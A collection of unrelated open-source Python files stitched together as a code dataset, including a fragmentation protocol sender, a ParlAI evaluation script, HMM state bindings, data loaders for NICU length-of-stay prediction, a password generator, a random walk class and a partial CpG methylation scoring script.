self.window_size, self.is_last_window, self.window_size,
self.fragment_list))
#--------------------------------------------------
def start(self):
assert self.state == "INIT"
self.state = "SEND"
self.send_current_fragment()
def get_current_fcn(self):
fi = self.window_fragment_index
if self.is_last_window and fi == self.window_size-1:
# 913 are expected when there is no error. The FCN for the last fragment
# 914 is an all-1. It is also important to note that, for No ACK mode or
return self.format_mgr.get_all_1(), True
else:
return self.window_size-1 - fi, False
def send_current_fragment(self):
assert self.state == "SEND"
frag_content = self.fragment_list[self.window_fragment_index]
advertized_fcn, is_very_last_fragment = self.get_current_fcn()
if is_very_last_fragment:
mic = self.mic
else: mic = b""
full_fragment = self.format_mgr.pack_fragment(
rule_id = self.rule_id, dtag = self.dtag,
window_index = self.window_index,
advertized_fcn = advertized_fcn,
payload = frag_content, mic = mic
)
self.system_manager.send_packet(full_fragment)
# 1384 regulation rules or constraints imposed by the applications. Each
# 1385 time a fragment is sent the FCN is decreased of one value and the
# 1386 bitmap is set. The send state can be leaved for different reasons
# XXX: is the bitmap the one of the FCN?
if self.window_fragment_index == self.window_size-1:
# 1386 bitmap is set. The send state can be leaved for different reasons
# 1387 (for both reasons it goes to WAIT BITMAP STATE):
self.state = "WAIT BITMAP"
if is_very_last_fragment:
# 1471 [...] FCN==0 & more frags [...]
# 1389 o The FCN reaches value 0 and there are more fragments. In that
# 1390 case an all-0 fragmet is sent and the timer is set. The sender
# 1391 will wait for the bitmap acknowledged by the receiver.
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window_index, False))
else:
# 1471 [...] last frag [...]
# 1393 o The last fragment is sent. In that case an all-1 fragment with
# 1394 the MIC is sent and the sender will wait for the bitmap
# 1395 acknowledged by the receiver. The sender set a timer to wait for
# 1396 the ack.
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window_index, True))
else:
self.window_fragment_index += 1
self.system_manager.add_event(
INTER_FRAGMENT_DELAY, self.event_next_fragment, ())
#--------------------------------------------------
def send_empty_fragment(self):
# 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
# 1411 last fragment has been sent) fragment is sent to ask the receiver to
if self.is_last_window:
advertized_fcn = self.format_mgr.get_all_0()
else: advertized_fcn = self.format_mgr.get_all_1()
XXX
self.system_manager.send_packet(empty_fragment)
def is_finished(self):
return not (self.position < len(self.full_packet))
def get_next_fragment_real(self):
return self.fragment.next_fragment(self.fragment_size)
def event_next_fragment(self):
assert self.state == "SEND"
# 1464 [...] send Window + frag(FCN)
self.send_current_fragment()
def event_wait_bitmap_timeout_check(self, window_index, final):
assert window_index <= self.window_index
if window_index != self.window_index:
return # not really a time out (as window_index has progressed)
assert self.state == "WAIT BITMAP"
# 1410 In ACK Always, if the timer expire, an empty All-0 (or All-1 if the
# 1411 last fragment has been sent) fragment is sent to ask the receiver to
# 1412 resent its bitmap. The window number is not changed.
print("WAIT BITMAP: timeout")
warnings.warn("XXX:should implement MAX_ATTEMPTS")
self.send_empty_fragment()
self.system_manager.add_event(
WAIT_BITMAP_TIMEOUT,
self.event_wait_bitmap_timeout_check, (self.window, True))
def event_packet(self, raw_packet):
#print("RECEIVE", raw_packet)
if self.state == "INIT":
print("ERROR: unexpected packet in state INIT", raw_packet)
return
elif self.state == "SEND":
print("ERROR: unexpected packet in state SEND", raw_packet)
return
elif self.state == "WAIT BITMAP":
# XXX:how do we know the packet format?:
self.process_ack(raw_packet)
else: raise RuntimeError("unexpected state", self.state)
def process_ack(self, raw_packet):
warnings.warn("XXX:hardwired formats, sizes, constants")
window, bitmap = struct.unpack(b"!BB", raw_packet)
bitmap = bitmap >> 1 # XXX - only for hardcoded case
print("ACK", window, bitmap, self.bitmap)
# 1662 If the window number on the received bitmap is correct, the sender
if window != self.window:
print("ERROR: bad window number", window, self.window)
return
if bitmap & ~self.bitmap != 0:
print("ERROR: inconsistent bitmap", bitmap, self.bitmap)
# XXX: what to do? - should not happen except for last
return
resend_bitmap = self.bitmap & ~bitmap
if resend_bitmap == 0:
# 1662 If the window number on the received bitmap is correct, the sender
# 1663 compare the local bitmap with the received bitmap. If they are equal
# 1664 all the fragments sent during the window have been well received. If
if not self.is_finished():
# 1665 at least one fragment need to be sent, the sender clear the bitmap,
# 1666 stop the timer and move its sending window to the next value. If no
# XXX: (optional) stop timer
self.window_index += 1
self.window = self.window+1 # XXX!!: modulo
nb_remaining_fragment = (self.nb_fragment
- self.window_size * self.window_index)
print("UPDATE:", nb_remaining_fragment, self.nb_fragment,
self.window_size, self.window_index)
self.fcn = min(nb_remaining_fragment, self.max_fcn) # XXX:factor in
unfinished, packet = self.get_next_fragment()
self.state = "SEND"
self.send_fragment_and_prepare_next(packet, unfinished)
else:
# 1667 more fragments have to be sent, then the fragmented packet
# 1668 transmission is terminated.
self.state = "END"
self.event_transmission_completed()
else:
# 1670 If some fragments are missing (not set in the bit map) then the
# 1671 sender resend the missing fragments. When the retransmission is
# 1672 finished, it start listening to the bitmap (even if a All-0 or All-1
# 1673 has not been sent during the retransmission) and returns to the
# 1674 waiting bitmap state.
# 1685 If the local-bitmap is different from the received bitmap the counter
# 1686 Attemps is increased and the sender resend the missing fragments
# 1687 again, when a MAX_ATTEMPS is reached the sender sends an Abort and
# 1688 goes to error.
raise NotImplementedError("XXX not implemented yet, sorry")
def event_transmission_completed(self):
print("transmssion completed")
def get_current_fragment(self):
print("fragment window={} fcn={} current_frag_index={}".format(
self.window, self.fcn, self.fragment_index))
header = struct.pack(b"!BB", self.window, self.fcn)
return header + bytes(self.content[self.fragment_index].encode("ascii"))
def process_ack_old(self, raw_packet):
# Next fragment
self.window = (self.window+1) % 2 # protocol
self.fcn = self.max_fcn_per_window # - because it will be the first of the new window
self.fragment_index += 1 # internal data structure
if self.fragment_index == len(self.content):
print("Finished trasnmission of fragments")
return b""
if self.fragment_index == len(self.content)-1:
self.fcn = 1 # protocol - because it is the end of the content in this case
return self.get_current_fragment() # XXX + "MIC"
else:
return self.get_current_fragment()
#---------------------------------------------------------------------------
| 2.328125 | 2 |
examples/eval_model_human.py | hwaranlee/ParlAI | 1 | 12773165 | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
# <NAME>, KAIST: 2017-present
"""Basic example which iterates through the tasks specified and
evaluates the given model on them.
For example:
`python examples/eval_model.py -t "babi:Task1k:2" -m "repeat_label"`
or
`python examples/eval_model.py -t "#CornellMovie" -m "ir_baseline" -mp "-lp 0.5"`
"""
import torch
from parlai.core.agents import create_agent
from parlai.core.worlds import create_task
from parlai.core.params import ParlaiParser
import random
import pdb
import logging, sys
from examples.train_model_seq2seq_ldecay import run_eval
def main():
# Get command line arguments
parser = ParlaiParser(True, True)
parser.set_defaults(datatype='valid')
parser.add_argument('-logger', '--log-file', default='', help='log file name')
parser.add_argument('--local-human', default=True, type='bool', help='log file name')
parser.add_argument('--display-examples', default=False, type='bool', help='')
parser.add_argument('--split-gpus', type=bool, default=False, help='Split gpus for a large model.')
opt = parser.parse_args()
# Set logging
if opt['log_file'] is not '':
logger = logging.getLogger('Evaluation: Seq2seq')
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s: %(message)s', '%m/%d/%Y %I:%M:%S %p')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
if 'log_file' in opt:
logfile = logging.FileHandler(opt['log_file'], 'w')
logfile.setFormatter(fmt)
logger.addHandler(logfile)
logger.info('[ COMMAND: %s ]' % ' '.join(sys.argv))
# Possibly build a dictionary (not all models do this).
#assert opt['dict_file'] is None, '[ Put dict file ]'
# Create model and assign it to the specified task
agent = create_agent(opt)
world = create_task(opt, agent)
run_eval(agent, opt, 'valid', write_log=True, logger=logger, generate=True, local_human=opt['local_human'])
world.shutdown()
if __name__ == '__main__':
main()
| 2.1875 | 2 |
imm/_state.py | EBI-Metagenomics/imm-py | 0 | 12773166 | <reponame>EBI-Metagenomics/imm-py
from __future__ import annotations
from enum import Enum
from typing import Iterable, Type
from ._alphabet import Alphabet
from ._cdata import CData
from ._ffi import ffi, lib
from ._lprob import lprob_is_valid
from ._sequence import Sequence
from ._sequence_table import SequenceTable
__all__ = ["State", "StateType", "NormalState", "MuteState", "TableState"]
class StateType(Enum):
MUTE = 0x00
NORMAL = 0x01
TABLE = 0x02
class State:
def __init__(self, imm_state: CData, alphabet: Alphabet):
"""
State.
Parameters
----------
imm_state
State pointer.
alphabet
Alphabet.
"""
self._imm_state = imm_state
if self._imm_state == ffi.NULL:
raise RuntimeError("`imm_state` is NULL.")
self._alphabet = alphabet
@property
def alphabet(self) -> Alphabet:
return self._alphabet
@property
def imm_state(self) -> CData:
return self._imm_state
@property
def name(self) -> bytes:
return ffi.string(lib.imm_state_get_name(self._imm_state))
@property
def min_seq(self) -> int:
return lib.imm_state_min_seq(self._imm_state)
@property
def max_seq(self) -> int:
return lib.imm_state_max_seq(self._imm_state)
def lprob(self, sequence: Sequence) -> float:
"""
Log-space probability of sequence emission.
Parameters
----------
sequence
Sequence.
"""
lprob: float = lib.imm_state_lprob(self._imm_state, sequence.imm_seq)
if not lprob_is_valid(lprob):
raise RuntimeError("Could not get probability.")
return lprob
def __str__(self) -> str:
# Refer to https://github.com/pytest-dev/pytest/issues/4659
if self._imm_state == ffi.NULL:
raise RuntimeError("State has failed to initialize.")
return f"{self.name.decode()}"
def __repr__(self) -> str:
return f"<{self.__class__.__name__}:{str(self)}>"
class MuteState(State):
def __init__(self, imm_mute_state: CData, alphabet: Alphabet):
"""
Mute state.
Parameters
----------
imm_mute_state
State pointer.
alphabet
Alphabet.
"""
self._imm_mute_state = imm_mute_state
if self._imm_mute_state == ffi.NULL:
raise RuntimeError("`imm_mute_state` is NULL.")
super().__init__(lib.imm_mute_state_super(self._imm_mute_state), alphabet)
@classmethod
def create(cls: Type[MuteState], name: bytes, alphabet: Alphabet) -> MuteState:
"""
Mute state.
Parameters
----------
name
State name.
alphabet
Alphabet.
"""
imm_mute_state = lib.imm_mute_state_create(name, alphabet.imm_abc)
return cls(imm_mute_state, alphabet)
def __del__(self):
if self._imm_mute_state != ffi.NULL:
lib.imm_mute_state_destroy(self._imm_mute_state)
def __repr__(self):
return f"<{self.__class__.__name__}:{str(self)}>"
class NormalState(State):
def __init__(self, imm_normal_state: CData, alphabet: Alphabet):
"""
Normal state.
Parameters
----------
imm_normal_state
State pointer.
alphabet
Alphabet.
"""
self._imm_normal_state = imm_normal_state
if self._imm_normal_state == ffi.NULL:
raise RuntimeError("`imm_normal_state` is NULL.")
super().__init__(lib.imm_normal_state_super(self._imm_normal_state), alphabet)
@classmethod
def create(
cls: Type[NormalState], name: bytes, alphabet: Alphabet, lprobs: Iterable[float]
) -> NormalState:
"""
Normal state.
Parameters
----------
name
State name.
alphabet
Alphabet.
lprobs
Emission probabilities in log-space for each alphabet letter.
"""
ptr = lib.imm_normal_state_create(name, alphabet.imm_abc, list(lprobs))
return cls(ptr, alphabet)
def __del__(self):
if self._imm_normal_state != ffi.NULL:
lib.imm_normal_state_destroy(self._imm_normal_state)
def __repr__(self):
return f"<{self.__class__.__name__}:{str(self)}>"
class TableState(State):
def __init__(self, imm_table_state: CData, alphabet: Alphabet):
"""
Table state.
Parameters
----------
imm_table_state
State pointer.
alphabet
Alphabet.
"""
self._imm_table_state = imm_table_state
if self._imm_table_state == ffi.NULL:
raise RuntimeError("`imm_table_state` is NULL.")
super().__init__(lib.imm_table_state_super(imm_table_state), alphabet)
@classmethod
def create(
cls: Type[TableState], name: bytes, sequence_table: SequenceTable
) -> TableState:
"""
Create table state.
Parameters
----------
name
State name.
sequence_table
Table of sequence probabilities.
"""
ptr = lib.imm_table_state_create(name, sequence_table.imm_seq_table)
return cls(ptr, sequence_table.alphabet)
def __del__(self):
if self._imm_table_state != ffi.NULL:
lib.imm_table_state_destroy(self._imm_table_state)
def __repr__(self):
return f"<{self.__class__.__name__}:{str(self)}>"
| 2.125 | 2 |
reporter/urls.py | AIRUNGU/promosy | 0 | 12773167 | from django.urls import path
from django.conf.urls import url
from reporter import views as r_views
from djgeojson.views import GeoJSONLayerView
from reporter import models as r_models
urlpatterns = [
path('home', r_views.Prohome, name='home'),
path('report/<str:code>/', r_views.Proreporter, name='code'),
path('data.geojson', GeoJSONLayerView.as_view(model=r_models.RealMapping), name='data')
] | 1.648438 | 2 |
pointnet2/train.py | hasanhamidi/Pointnet2_PyTorch | 0 | 12773168 | import os
import sys
pointnet2_dir = os.path.split(os.path.abspath(__file__))[0]
main_dir = "/".join(pointnet2_dir.split("/")[0:-1])
pointnet2_ops_lib_dir = main_dir+"/pointnet2_ops_lib/"
sys.path.insert(0,main_dir)
sys.path.insert(0,pointnet2_ops_lib_dir)
import hydra
import omegaconf
import pytorch_lightning as pl
import torch
from pytorch_lightning.loggers import TensorBoardLogger
from surgeon_pytorch import Inspect,get_layers
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def hydra_params_to_dotdict(hparams):
def _to_dot_dict(cfg):
res = {}
for k, v in cfg.items():
if isinstance(v, omegaconf.DictConfig):
res.update(
{k + "." + subk: subv for subk, subv in _to_dot_dict(v).items()}
)
elif isinstance(v, (str, int, float, bool)):
res[k] = v
return res
return _to_dot_dict(hparams)
@hydra.main("config/config.yaml")
def main(cfg):
model = hydra.utils.instantiate(cfg.task_model, hydra_params_to_dotdict(cfg))
early_stop_callback = pl.callbacks.EarlyStopping(patience=5)
checkpoint_callback = pl.callbacks.ModelCheckpoint(
monitor="val_acc",
mode="max",
save_top_k=2,
filepath=os.path.join(
cfg.task_model.name, "{epoch}-{val_loss:.2f}-{val_acc:.3f}"
),
verbose=True,
)
trainer = pl.Trainer(
gpus=list(cfg.gpus),
max_epochs=cfg.epochs,
early_stop_callback=early_stop_callback,
checkpoint_callback=checkpoint_callback,
distributed_backend=cfg.distrib_backend
)
print(get_layers(model))
# trainer.fit(model)
# trainer.test(model)
if __name__ == "__main__":
main()
| 2 | 2 |
nicu_los/src/utils/data_helpers.py | bt-s/NICU-length-of-stay-prediction | 2 | 12773169 | <filename>nicu_los/src/utils/data_helpers.py
#!/usr/bin/python3
"""data_helpers.py
Various utility functions for data loading
"""
__author__ = "<NAME>"
import json, os, random
import numpy as np
import pandas as pd
from sklearn.utils import shuffle
from tqdm import tqdm
from nicu_los.src.utils.utils import get_subject_dirs
def create_list_file(subject_dirs, list_file_path,
ts_fname='timeseries_normalized.csv'):
"""Create a file containing a list of paths to timeseries data frames
Args:
subject_dirs (list): List of subject directories
list_file_path (str): Path to the list file
ts_fname (str): Name of the timeseries file
"""
with open(list_file_path, 'a') as f:
for i, sd in enumerate(tqdm(subject_dirs)):
ts = pd.read_csv(os.path.join(sd, ts_fname))
# Start from 4, since we only start predicting from the first four
# hours of the stay
for row in range(4, len(ts)+1):
f.write(f'{sd}, {row}\n')
def data_generator(list_file, config='nicu_los/config.json',
ts_file='timeseries_normalized.csv', coarse_targets=False,
gestational_age=True, mask=True, task='classification',
shuffle=True):
"""Data loader function
Args:
list_file (str): Path to the .txt file containing a list of (filename,
sequence length) combinations
config (str): Path to the nicu_los config file
ts_file (str): Name of the files containing the timeseries
coarse_targets (bool): Whether to use coarse targets
gestational_age (bool): Whether to use the gestational age variable
mask (bool): Whether to use missingness indicator variables
task (str): One of 'classification' and 'regression'
shuffle (bool): Whether to shuffle the data
Yields:
X (np.ndarray): Features corresponding to one data batch
EITHER (if task == 'regression'):
y ():
OR (if task == 'classification'):
t ():
"""
with open(list_file, 'r') as f:
data = f.readlines()
data = [line.split(',') for line in data]
data = [(subject_dir, int(row)) for (subject_dir, row) in data]
with open(config) as f:
config = json.load(f)
variables = config['variables']
if not gestational_age and "GESTATIONAL_AGE_DAYS" in variables:
variables.remove("GESTATIONAL_AGE_DAYS")
if mask:
variables = variables + ['mask_' + v for v in variables]
if shuffle:
random.shuffle(data)
while True:
if shuffle:
random.shuffle(data)
index = 0
while index < len(data)-1:
sd, row = data[index][0], data[index][1]
index += 1
ts = pd.read_csv(os.path.join(sd, ts_file))[:row]
X = ts[variables].to_numpy()
y = ts.LOS_HOURS.iloc[-1]
if coarse_targets:
t = ts.TARGET_COARSE.iloc[-1]
else:
t = ts.TARGET_FINE.iloc[-1]
if task == 'regression':
yield (X, y)
else:
yield (X, t)
def get_baseline_datasets(subject_dirs, coarse_targets=False, pre_imputed=False,
targets_only=False, config='nicu_los/config.json'):
"""Obtain baseline data sets
Args:
subject_dirs (list): List of subject directories
coarse_targets (bool): Whether to use coarse targets
pre_imputed (bool): Whether to use features from pre-imputed data
targets_only (bool): Whether to only load the targets
Returns:
X (np.ndarray|None): Features
y (np.array): Targets -- remaining LOS
t (np.array): Target -- buckets
"""
tot_num_sub_seqs = 0
for i, sd in enumerate(tqdm(subject_dirs)):
tot_num_sub_seqs += len(pd.read_csv(os.path.join(sd,
'timeseries.csv')))
with open(config) as f:
config = json.load(f)
variables = config['variables']
sub_seqs = config['baseline_subsequences']
stat_fns = config['stat_fns']
# Add the masks
variables = ['mask_' + v for v in variables]
if not targets_only:
X = np.zeros((tot_num_sub_seqs,
len(variables)*len(sub_seqs)*len(stat_fns)))
else:
X = None
y, t = np.zeros(tot_num_sub_seqs), np.zeros(tot_num_sub_seqs)
if coarse_targets:
target_str = 'coarse'
else:
target_str = 'fine'
pi_str = ''
if pre_imputed:
pi_str = '_pre_imputed'
cnt = 0
for i, sd in enumerate(tqdm(subject_dirs)):
cnt_old = cnt
if not targets_only:
x = np.load(os.path.join(sd, f'X_baseline{pi_str}.npy'))
yy = np.load(os.path.join(sd, f'y_baseline{pi_str}.npy'))
tt = np.load(os.path.join(sd, f't_baseline_{target_str}{pi_str}.npy'))
cnt += len(yy)
if not targets_only:
X[cnt_old:cnt, :] = x
y[cnt_old:cnt] = yy
t[cnt_old:cnt] = tt
if not targets_only:
X, y, t = shuffle(X, y, t)
return X, y, t
else:
y, t = shuffle(y, t)
return y, t
def get_optimal_bucket_boundaries(n=100):
"""Function to get the optimal bucket boundaries
Args:
n (int): Number of buckets
Returns:
bucket_boundaries (list): Optimal bucket boundaries for n
"""
train_list_file = os.path.join('data', 'train_list.txt')
val_list_file = os.path.join('data', 'val_list.txt')
test_list_file = os.path.join('data', 'test_list.txt')
list_files = [train_list_file, val_list_file, test_list_file]
data = []
for list_file in list_files :
with open(list_file, 'r') as f:
data += f.readlines()
data = [line.split(',') for line in data]
data = [(subject_dir, int(row)) for (subject_dir, row) in data]
rows = []
for _, r in data:
rows.append(r)
rows = sorted(rows)
bucket_boundaries = []
for i in range(n):
bucket_boundaries.append(rows[len(rows)//100*i])
return bucket_boundaries
| 2.734375 | 3 |
yacht/config/proto/policy_pb2.py | IusztinPaul/yacht | 5 | 12773170 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yacht/config/proto/policy.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from yacht.config.proto import feature_extractor_pb2 as yacht_dot_config_dot_proto_dot_feature__extractor__pb2
from yacht.config.proto import net_architecture_pb2 as yacht_dot_config_dot_proto_dot_net__architecture__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yacht/config/proto/policy.proto',
package='yacht.config.proto',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x1fyacht/config/proto/policy.proto\x12\x12yacht.config.proto\x1a*yacht/config/proto/feature_extractor.proto\x1a)yacht/config/proto/net_architecture.proto\"\xb7\x01\n\x0cPolicyConfig\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x15\n\ractivation_fn\x18\x02 \x01(\t\x12\x45\n\x11\x66\x65\x61ture_extractor\x18\x03 \x01(\x0b\x32*.yacht.config.proto.FeatureExtractorConfig\x12;\n\x08net_arch\x18\x04 \x01(\x0b\x32).yacht.config.proto.NetArchitectureConfigb\x06proto3')
,
dependencies=[yacht_dot_config_dot_proto_dot_feature__extractor__pb2.DESCRIPTOR,yacht_dot_config_dot_proto_dot_net__architecture__pb2.DESCRIPTOR,])
_POLICYCONFIG = _descriptor.Descriptor(
name='PolicyConfig',
full_name='yacht.config.proto.PolicyConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='yacht.config.proto.PolicyConfig.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activation_fn', full_name='yacht.config.proto.PolicyConfig.activation_fn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature_extractor', full_name='yacht.config.proto.PolicyConfig.feature_extractor', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='net_arch', full_name='yacht.config.proto.PolicyConfig.net_arch', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=143,
serialized_end=326,
)
_POLICYCONFIG.fields_by_name['feature_extractor'].message_type = yacht_dot_config_dot_proto_dot_feature__extractor__pb2._FEATUREEXTRACTORCONFIG
_POLICYCONFIG.fields_by_name['net_arch'].message_type = yacht_dot_config_dot_proto_dot_net__architecture__pb2._NETARCHITECTURECONFIG
DESCRIPTOR.message_types_by_name['PolicyConfig'] = _POLICYCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PolicyConfig = _reflection.GeneratedProtocolMessageType('PolicyConfig', (_message.Message,), dict(
DESCRIPTOR = _POLICYCONFIG,
__module__ = 'yacht.config.proto.policy_pb2'
# @@protoc_insertion_point(class_scope:yacht.config.proto.PolicyConfig)
))
_sym_db.RegisterMessage(PolicyConfig)
# @@protoc_insertion_point(module_scope)
| 1.21875 | 1 |
sanic_template/runner.py | aragentum/sanic-template | 2 | 12773171 | <filename>sanic_template/runner.py<gh_stars>1-10
from sanic import Sanic
from sanic_template import database, api, error
from sanic_template.conf import settings
from sanic_template.other import logging
app = Sanic("sanic_app", log_config=settings.LOGGING_CONFIG)
app.config.from_object(settings)
# init
logging.setup()
database.setup(app)
api.setup(app)
error.setup(app)
@app.listener("after_server_start")
async def create_initial_data(app, loop):
from sanic_template.database.repo.user_repo import user_repo
await user_repo.create_or_update("aragentum", "Roman", "Averchenkov")
def run():
app.run(host="0.0.0.0", port=8000, workers=1,
debug=app.config.DEBUG, auto_reload=app.config.DEBUG)
if __name__ == '__main__':
run()
| 2.078125 | 2 |
app/password_generator.py | chrisstime/nutcracker | 0 | 12773172 | <gh_stars>0
#!/usr/bin/env python3
"""Password generator module"""
from random import sample, choices
from string import ascii_letters, punctuation, digits
options_dict = {
'symbols': punctuation,
'letters': ascii_letters,
'numbers': digits
}
def _shuffle_characters(symbols: bool, letters: bool, numbers: bool):
included_characters = list()
characters_dict = {'symbols': symbols, 'letters': letters, 'numbers': numbers}
for character_type, include_option in characters_dict.items():
if include_option:
included_characters.extend(options_dict[character_type])
if included_characters:
return sample(included_characters, len(included_characters))
def _format_password(generated_password_array):
return "".join(generated_password_array)
def generate_password(symbols: bool, letters: bool, numbers: bool, password_length):
shuffled_characters = _shuffle_characters(symbols=symbols, letters=letters, numbers=numbers)
if shuffled_characters:
return _format_password(choices(shuffled_characters, k=password_length))
| 3.6875 | 4 |
random_walk.py | leksoid/data-vis-project | 0 | 12773173 | <reponame>leksoid/data-vis-project<gh_stars>0
from random import choice
class RandomWalk:
"""A class to generate random walks"""
def __init__(self, num_points=5000):
self.num_points = num_points
self.x_values = [0]
self.y_values = [0]
def fill_walk(self):
"""Calculate all the points in the walk"""
while len(self.x_values) < self.num_points:
x_step = self.get_step()
y_step = self.get_step()
if x_step == 0 and y_step == 0:
continue
x = self.x_values[-1] + x_step
y = self.y_values[-1] + y_step
self.x_values.append(x)
self.y_values.append(y)
def get_step(self):
return choice([1, -1]) * choice([0, 1, 2, 3, 4]) | 3.65625 | 4 |
aligned_bam_to_cpg_scores.py | PacificBiosciences/pb-CpG-tools | 5 | 12773174 | #!/usr/bin/env python
# coding: utf-8
import argparse
import concurrent.futures
import logging
import numpy as np
import pandas as pd
import pyBigWig
import pysam
import os
import re
import sys
from Bio import SeqIO
from Bio.Seq import Seq
from collections import Counter
from numpy.lib.stride_tricks import sliding_window_view
from operator import itemgetter
from tqdm import tqdm
os.environ["CUDA_VISIBLE_DEVICES"] = ""
def get_args():
"""
Get arguments from command line with argparse.
"""
parser = argparse.ArgumentParser(
prog='aligned_bam_to_cpg_scores.py',
description="""Calculate CpG positions and scores from an aligned bam file. Outputs raw and
coverage-filtered results in bed and bigwig format, including haplotype-specific results (when available).""")
parser.add_argument("-b", "--bam",
required=True,
metavar="input.bam",
help="The aligned BAM file.")
parser.add_argument("-f", "--fasta",
required=True,
metavar="ref.fasta",
help="The reference fasta file.")
parser.add_argument("-o", "--output_label",
required=True,
metavar="label",
help="Label for output files, which results in [label].bed/bw.")
parser.add_argument("-p", "--pileup_mode",
required=False,
choices=["model", "count"],
default="model",
help="Use a model-based approach to score modifications across sites (model) "
"or a simple count-based approach (count). [default = %(default)s]")
parser.add_argument("-d", "--model_dir",
required=False,
default=None,
metavar="/path/to/model/dir",
help="Full path to the directory containing the model (*.pb files) to load. [default = None]")
parser.add_argument("-m", "--modsites",
required=False,
choices=["denovo", "reference"],
default="denovo",
help="Only output CG sites with a modification probability > 0 "
"(denovo), or output all CG sites based on the "
"supplied reference fasta (reference). [default = %(default)s]")
parser.add_argument("-c", "--min_coverage",
required=False,
default=4,
type=int,
metavar="int",
help="Minimum coverage required for filtered outputs. [default: %(default)d]")
parser.add_argument("-q", "--min_mapq",
required=False,
default=0,
type=int,
metavar="int",
help="Ignore alignments with MAPQ < N. [default: %(default)d]")
parser.add_argument("-a", "--hap_tag",
required=False,
default="HP",
metavar="TAG",
help="The SAM tag containing haplotype information. [default: %(default)s]")
parser.add_argument("-s", "--chunksize",
required=False,
default=500000,
type=int,
metavar="int",
help="Break reference regions into chunks "
"of this size for parallel processing. [default = %(default)d]")
parser.add_argument("-t", "--threads",
required=False,
default=1,
type=int,
metavar="int",
help="Number of threads for parallel processing. [default = %(default)d]")
return parser.parse_args()
def setup_logging(output_label):
"""
Set up logging to file.
"""
logname = "{}-aligned_bam_to_cpg_scores.log".format(output_label)
# ensure logging file does not exist, if so remove
if os.path.exists(logname):
os.remove(logname)
# set up logging to file
logging.basicConfig(filename=logname,
format="%(asctime)s: %(levelname)s: %(message)s",
datefmt='%d-%b-%y %H:%M:%S',
level=logging.DEBUG)
def log_args(args):
"""
Record argument settings in log file.
"""
logging.info("Using following argument settings:")
for arg, val in vars(args).items():
logging.info("\t--{}: {}".format(arg, val))
def get_regions_to_process(input_bam, input_fasta, chunksize, modsites, pileup_mode, model_dir, min_mapq, hap_tag):
"""
Breaks reference regions into smaller regions based on chunk
size specified. Returns a list of lists that can be used for
multiprocessing. Each sublist contains:
[bam path (str), fasta path (str), modsites (str),
reference name (str), start coordinate (int), stop coordinate (int)]
:param input_bam: Path to input bam file. (str)
:param input_fasta: Path to reference fasta file. (str)
:param chunksize: Chunk size (default = 500000). (int)
:param modsites: Filtering method. (str: "denovo", "reference")
:param pileup_mode: Site modification calling method. (str: "model", "count")
:param model_dir: Full path to model directory to load (if supplied), otherwise is None.
:param min_mapq: Minimum mapping quality score. (int)
:param hap_tag: The SAM tag label containing haplotype information. (str)
:return regions_to_process: List of lists containing region sizes. (list)
"""
logging.info("get_regions_to_process: Starting chunking.")
# open the input bam file with pysam
bamIn = pysam.AlignmentFile(input_bam, 'rb')
# empty list to store sublists with region information
regions_to_process = []
# iterate over reference names and their corresponding lengths
references = zip(bamIn.references, bamIn.lengths)
for ref, length in references:
start = 1
while start < length:
end = start + chunksize
if end < length:
regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, start, end - 1, min_mapq, hap_tag])
else:
regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, start, length, min_mapq, hap_tag])
start = start + chunksize
# close bam
bamIn.close()
logging.info("get_regions_to_process: Created {:,} region chunks.\n".format(len(regions_to_process)))
return regions_to_process
def cg_sites_from_fasta(input_fasta, ref):
"""
Gets all CG site positions from a given reference region, and
make positions keys in a dict with empty strings as vals.
:param input_fasta: A path to reference fasta file. (str)
:param ref: Reference name. (str)
:return cg_sites_ref_set: Set with all CG ref positions. (set)
"""
# open fasta with BioPython and iterated over records
with open(input_fasta) as fh:
for record in SeqIO.parse(fh, "fasta"):
# if record name matches this particular ref,
if record.id == ref:
# use regex to find all indices for 'CG' in the reference seq, e.g. the C positions
cg_sites_ref_set = {i.start() for i in re.finditer('CG', str(record.seq.upper()))}
# there may be some stretches without any CpGs in a reference region
# handle these edge cases by adding a dummy value of -1 (an impossible coordinate)
